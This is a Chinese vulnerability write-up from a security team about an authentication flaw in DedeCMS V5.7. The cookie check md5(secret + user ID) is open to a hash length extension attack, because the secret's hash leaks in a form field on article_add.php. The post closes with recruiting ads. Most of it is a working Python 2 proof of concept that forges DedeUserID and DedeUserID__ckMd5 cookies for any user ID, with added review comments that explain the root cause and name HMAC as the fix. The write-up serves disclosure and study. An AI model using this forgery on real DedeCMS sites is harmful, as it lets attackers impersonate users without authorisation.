记DedeCMS一处由哈希长度拓展攻击引起的越权漏洞

【
本文来自 ChaMd5安全团队审计组 呆哥，文章内容以思路为主。
如需转载，请先联系ChaMd5安全团队授权。
未经授权请勿转载。
】

漏洞影响：Dedecms(织梦CMS) V5.7.72 正式版20180109 (最新版)

漏洞原理：
DedeCMS用户认证是通过验证Cookie中的 DedeUserID和DedeUserID__ckMd5进行的，具体如下：

其中$cfg_cookie_encode是安装时生成的不可预测字符串。
其中md5($cfg_cookie_encode.$_COOKIE[$key])符合md5(salt + padding + data)的格式，易受哈希长度拓展攻击，只要我们知道了md5($cfg_cookie_encode)和$cfg_cookie_encode的长度即可伪造cookie。
从安装时的逻辑中我们可以知道$cfg_cookie_encode的长度为28~32

找到\member\article_add.php

25行检测dopost是否为空，46行导入模板文件
找到\member\templets\article_add.htm

74行调用PrintAutoFieldsAdd()，跟进去

238行输出$dede_addonfields
239行输出md5($dede_addonfields.$cfg_cookie_encode)
浏览器中直接访问，可知在默认情况下$dede_addonfields为空值

因此表单dede_fieldshash的值就是md5($cfg_cookie_encode)
找到MemberLogin类，M_ID 在从cookie中获取时会调用GetNum()进行处理

跟进去

这样处理一下就会消除哈希长度扩展攻击引入的空字符等特殊字符的影响
但是在全局文件config.php中会对输入调用XSSClean()对$_COOKIE进行过滤

从24行可知，空字符会被替换为空导致漏洞不能利用。
又研究了一下发现\plus下的文件都是直接包含common.inc.php而不是config.php
因此可以利用此目录下的文件进行哈希长度拓展攻击！
例如，\plus\feedback_ajax.php 用于文章评论，因此这里可以利用哈希长度拓展攻击伪造任意用户身份实现越权评论文章！

参考链接：
https://blog.csdn.net/qq_35078631/article/details/70941204
POC:

# NOTE(review): Python 2 only -- the code relies on str.encode("hex"), xrange,
# the print/exec statements and the "L" long-integer suffix, none of which
# exist in Python 3.
import sys
import hashlib
import urllib
# NOTE(review): sys, hashlib and urllib are imported but never used below.
# The digest is produced by the hand-written MD5 in run_md5(), which -- unlike
# hashlib -- can be started from an arbitrary internal state.

# Only the following two parameters need to be changed for this POC.
userid = '1' #the user id whose cookie is being forged
dede_fieldshash = '8b5d1a6dd0899aff8658b667a0923765' #taken from the page source of article_add.php (md5($cfg_cookie_encode) when $dede_addonfields is empty)

# NOTE(review): the root cause, as described in the write-up, is the unkeyed
# construction md5(secret . data): an MD5 digest is simply the internal state
# after absorbing the padded input, so knowing the digest and the secret's
# length is enough to keep hashing from that state. A keyed MAC (e.g. HMAC)
# over the cookie value does not have this property and is the defensive fix.

def genMsgLengthDescriptor(msg_bitsLenth):
    # Bit length as a big-endian 64-bit integer, hex encoded.
    return __import__("struct").pack(">Q",msg_bitsLenth).encode("hex")

def reverse_hex_8bytes(hex_str):
    # Byte-swap an 8-byte hex value (big-endian hex in, little-endian hex out).
    hex_str = "%016x"%int(hex_str,16)
    assert len(hex_str)==16
    return __import__("struct").pack("<Q",int(hex_str,16)).encode("hex")

def reverse_hex_4bytes(hex_str):
    # Byte-swap a 4-byte hex value (big-endian hex in, little-endian hex out).
    hex_str = "%08x"%int(hex_str,16)
    assert len(hex_str)==8
    return __import__("struct").pack("<L",int(hex_str,16)).encode("hex")

def deal_rawInputMsg(input_msg):
    # Standard MD5 padding of a byte string: append 0x80, zero-fill until the
    # bit length is 64 short of a multiple of 512, then append the original
    # bit length as a little-endian 64-bit integer. Returns the padded message
    # as a hex string (two hex chars per byte).
    ascii_list = [x.encode("hex") for x in input_msg]
    length_msg_bytes = len(ascii_list)  # unused
    length_msg_bits = len(ascii_list)*8
    ascii_list.append('80')
    while (len(ascii_list)*8+64)%512 != 0:
        ascii_list.append('00')
    ascii_list.append(reverse_hex_8bytes(genMsgLengthDescriptor(length_msg_bits)))
    return "".join(ascii_list)

def getM16(hex_str,operatingBlockNum):
    # The sixteen little-endian 32-bit words of 64-byte block number
    # operatingBlockNum (1-based) of the hex-encoded message: 128 hex chars
    # per block, 8 per word.
    M = [int(reverse_hex_4bytes(hex_str[i:(i+8)]),16) for i in xrange(128*(operatingBlockNum-1),128*operatingBlockNum,8)]
    return M

def T(i):
    # RFC 1321 constant generator floor(2^32 * |sin(i)|). Not called here:
    # the 64 constants are written out inline in run_md5().
    result = (int(4294967296*abs(__import__("math").sin(i))))&0xffffffff
    return result

# MD5 auxiliary functions for rounds 1-4 (RFC 1321, section 3.4).
F = lambda x,y,z:((x&y)|((~x)&z))
G = lambda x,y,z:((x&z)|(y&(~z)))
H = lambda x,y,z:(x^y^z)
I = lambda x,y,z:(y^(x|(~z)))
# 32-bit rotate left; the alias L is never used.
RL = L = lambda x,n:(((x<<n)|(x>>(32-n)))&(0xffffffff))

def FF(a, b, c, d, x, s, ac):
    # One round-1 step: a = b + ((a + F(b,c,d) + x + ac) <<< s), mod 2^32.
    a = (a+F ((b), (c), (d)) + (x) + (ac)&0xffffffff)&0xffffffff;
    a = RL ((a), (s))&0xffffffff;
    a = (a+b)&0xffffffff
    return a

def GG(a, b, c, d, x, s, ac):
    # One round-2 step, same shape as FF with G.
    a = (a+G ((b), (c), (d)) + (x) + (ac)&0xffffffff)&0xffffffff;
    a = RL ((a), (s))&0xffffffff;
    a = (a+b)&0xffffffff
    return a

def HH(a, b, c, d, x, s, ac):
    # One round-3 step, same shape as FF with H.
    a = (a+H ((b), (c), (d)) + (x) + (ac)&0xffffffff)&0xffffffff;
    a = RL ((a), (s))&0xffffffff;
    a = (a+b)&0xffffffff
    return a

def II(a, b, c, d, x, s, ac):
    # One round-4 step, same shape as FF with I.
    a = (a+I ((b), (c), (d)) + (x) + (ac)&0xffffffff)&0xffffffff;
    a = RL ((a), (s))&0xffffffff;
    a = (a+b)&0xffffffff
    return a

def show_md5(A,B,C,D):
    # Serialise the four state words as the usual 32-char hex digest: each
    # word is printed big-endian and its byte pairs then reversed, i.e. the
    # bytes come out little-endian.
    return "".join( [  "".join(__import__("re").findall(r"..","%08x"%i)[::-1]) for i in (A,B,C,D)  ]  )

def run_md5(A=0x67452301,B=0xefcdab89,C=0x98badcfe,D=0x10325476,readyMsg=""):
    # MD5 compression loop over readyMsg (hex encoded, already padded, a whole
    # number of 64-byte blocks) starting from the state (A,B,C,D). With the
    # default initial values this is plain MD5 of the padded input; seeding it
    # with the four words of an existing digest instead continues that hash,
    # which is the length-extension step used at the bottom of the script.
    a = A
    b = B
    c = C
    d = D
    for i in xrange(0,len(readyMsg)/128):
        M = getM16(readyMsg,i+1)
        # Bind M0..M15 as local names via exec (indexing M directly would do
        # the same). NOTE: this inner loop rebinds i; harmless because the
        # outer i is only read in the getM16 call above.
        for i in xrange(16):
            exec "M"+str(i)+"=M["+str(i)+"]"
        #First round
        a=FF(a,b,c,d,M0,7,0xd76aa478L)
        d=FF(d,a,b,c,M1,12,0xe8c7b756L)
        c=FF(c,d,a,b,M2,17,0x242070dbL)
        b=FF(b,c,d,a,M3,22,0xc1bdceeeL)
        a=FF(a,b,c,d,M4,7,0xf57c0fafL)
        d=FF(d,a,b,c,M5,12,0x4787c62aL)
        c=FF(c,d,a,b,M6,17,0xa8304613L)
        b=FF(b,c,d,a,M7,22,0xfd469501L)
        a=FF(a,b,c,d,M8,7,0x698098d8L)
        d=FF(d,a,b,c,M9,12,0x8b44f7afL)
        c=FF(c,d,a,b,M10,17,0xffff5bb1L)
        b=FF(b,c,d,a,M11,22,0x895cd7beL)
        a=FF(a,b,c,d,M12,7,0x6b901122L)
        d=FF(d,a,b,c,M13,12,0xfd987193L)
        c=FF(c,d,a,b,M14,17,0xa679438eL)
        b=FF(b,c,d,a,M15,22,0x49b40821L)
        #Second round
        a=GG(a,b,c,d,M1,5,0xf61e2562L)
        d=GG(d,a,b,c,M6,9,0xc040b340L)
        c=GG(c,d,a,b,M11,14,0x265e5a51L)
        b=GG(b,c,d,a,M0,20,0xe9b6c7aaL)
        a=GG(a,b,c,d,M5,5,0xd62f105dL)
        d=GG(d,a,b,c,M10,9,0x02441453L)
        c=GG(c,d,a,b,M15,14,0xd8a1e681L)
        b=GG(b,c,d,a,M4,20,0xe7d3fbc8L)
        a=GG(a,b,c,d,M9,5,0x21e1cde6L)
        d=GG(d,a,b,c,M14,9,0xc33707d6L)
        c=GG(c,d,a,b,M3,14,0xf4d50d87L)
        b=GG(b,c,d,a,M8,20,0x455a14edL)
        a=GG(a,b,c,d,M13,5,0xa9e3e905L)
        d=GG(d,a,b,c,M2,9,0xfcefa3f8L)
        c=GG(c,d,a,b,M7,14,0x676f02d9L)
        b=GG(b,c,d,a,M12,20,0x8d2a4c8aL)
        #Third round
        a=HH(a,b,c,d,M5,4,0xfffa3942L)
        d=HH(d,a,b,c,M8,11,0x8771f681L)
        c=HH(c,d,a,b,M11,16,0x6d9d6122L)
        b=HH(b,c,d,a,M14,23,0xfde5380c)
        a=HH(a,b,c,d,M1,4,0xa4beea44L)
        d=HH(d,a,b,c,M4,11,0x4bdecfa9L)
        c=HH(c,d,a,b,M7,16,0xf6bb4b60L)
        b=HH(b,c,d,a,M10,23,0xbebfbc70L)
        a=HH(a,b,c,d,M13,4,0x289b7ec6L)
        d=HH(d,a,b,c,M0,11,0xeaa127faL)
        c=HH(c,d,a,b,M3,16,0xd4ef3085L)
        b=HH(b,c,d,a,M6,23,0x04881d05L)
        a=HH(a,b,c,d,M9,4,0xd9d4d039L)
        d=HH(d,a,b,c,M12,11,0xe6db99e5L)
        c=HH(c,d,a,b,M15,16,0x1fa27cf8L)
        b=HH(b,c,d,a,M2,23,0xc4ac5665L)
        #Fourth round
        a=II(a,b,c,d,M0,6,0xf4292244L)
        d=II(d,a,b,c,M7,10,0x432aff97L)
        c=II(c,d,a,b,M14,15,0xab9423a7L)
        b=II(b,c,d,a,M5,21,0xfc93a039L)
        a=II(a,b,c,d,M12,6,0x655b59c3L)
        d=II(d,a,b,c,M3,10,0x8f0ccc92L)
        c=II(c,d,a,b,M10,15,0xffeff47dL)
        b=II(b,c,d,a,M1,21,0x85845dd1L)
        a=II(a,b,c,d,M8,6,0x6fa87e4fL)
        d=II(d,a,b,c,M15,10,0xfe2ce6e0L)
        c=II(c,d,a,b,M6,15,0xa3014314L)
        b=II(b,c,d,a,M13,21,0x4e0811a1L)
        a=II(a,b,c,d,M4,6,0xf7537e82L)
        d=II(d,a,b,c,M11,10,0xbd3af235L)
        c=II(c,d,a,b,M2,15,0x2ad7d2bbL)
        b=II(b,c,d,a,M9,21,0xeb86d391L)
        # Add this block's result into the running state, mod 2^32.
        A += a
        B += b
        C += c
        D += d
        A = A&0xffffffff
        B = B&0xffffffff
        C = C&0xffffffff
        D = D&0xffffffff
        a = A
        b = B
        c = C
        d = D
    return show_md5(a,b,c,d)

# Split the known 32-char digest into four 8-char words and byte-swap each one
# back into the little-endian state word it was serialised from (the inverse
# of show_md5). exec turns the '0x...' string into an int; int(s1, 16) would
# do the same without exec. [24:36] over-slices, but on a 32-char string it
# yields the same 8 chars as [24:32].
cfg_cookie_encode_md5 = dede_fieldshash
s1 = cfg_cookie_encode_md5[0:8]
s1 = '0x' + s1[6:8] + s1[4:6] + s1[2:4] + s1[0:2]
s2 = cfg_cookie_encode_md5[8:16]
s2 = '0x' + s2[6:8] + s2[4:6] + s2[2:4] + s2[0:2]
s3 = cfg_cookie_encode_md5[16:24]
s3 = '0x' + s3[6:8] + s3[4:6] + s3[2:4] + s3[0:2]
s4 = cfg_cookie_encode_md5[24:36]
s4 = '0x' + s4[6:8] + s4[4:6] + s4[2:4] + s4[0:2]
exec('s1=%s' %s1)
exec('s2=%s' %s2)
exec('s3=%s' %s3)
exec('s4=%s' %s4)

# This loop produces 5 candidate DedeUserID values, because the length of
# $cfg_cookie_encode cannot be predicted (28..32 per the write-up).
for origin_length in range(28,33):
    # Rebuild the padding MD5 itself applied to a secret of origin_length
    # bytes: 'a' stands in for the unknown secret bytes (only the length
    # matters), then 0x80, zero fill and the 64-bit little-endian bit length;
    # userid is the data that follows. origin_length*8 exceeds one byte only
    # for 32 (256 = 0x0100), hence the special case.
    if origin_length != 32:
        length = chr(origin_length*8)
        secret_admin = 'a'*origin_length+'\x80'+'\x00'*(64-origin_length-1-8)+length+'\x00'*7 + userid
    else:
        secret_admin = 'a'*origin_length+'\x80'+'\x00'*(64-origin_length-1-8)+'\x00\x01'+'\x00'*6 + userid
    # Pad the whole message again so run_md5 can process it block by block.
    r = deal_rawInputMsg(secret_admin)
    # Second half of the hex = everything after the first 64-byte block, i.e.
    # the block the seeded state still has to absorb. NOTE(review): this
    # assumes the padded message is exactly two blocks (len(userid) <= 55).
    inp = r[len(r)/2:]
    # Percent-encode the first block byte by byte (two hex chars -> %xx).
    ans = ''
    cnt = 0
    for i in r[:len(r)/2]:
        if(cnt%2 == 0):
            ans += '%'
        ans += i
        cnt += 1
    # Drop the 'a' placeholder prefix (3 chars per byte) so the cookie value is
    # only the glue padding plus userid; the server itself prepends the secret.
    print "DedeUserID: "+ans[(origin_length*3):]+userid
    print
    # The continued digest, truncated to its first 16 hex chars.
    print "DedeUserID__ckMd5: "+run_md5(s1,s2,s3,s4,inp)[0:16]

PS:
关于哈希长度扩展攻击的工具，可参考pcat的两篇博文：
http://www.cnblogs.com/pcat/p/7668989.html
http://www.cnblogs.com/pcat/p/5478509.html

~ChaMd5安全招聘~
启明星辰云众可信
安全服务工程师/经理
http://www.chamd5.org/jobdetail.aspx?id=510

G7物联网物流
渗透测试工程师
http://www.chamd5.org/jobdetail.aspx?id=509

360企业安全
高级攻防
http://www.chamd5.org/jobdetail.aspx?id=498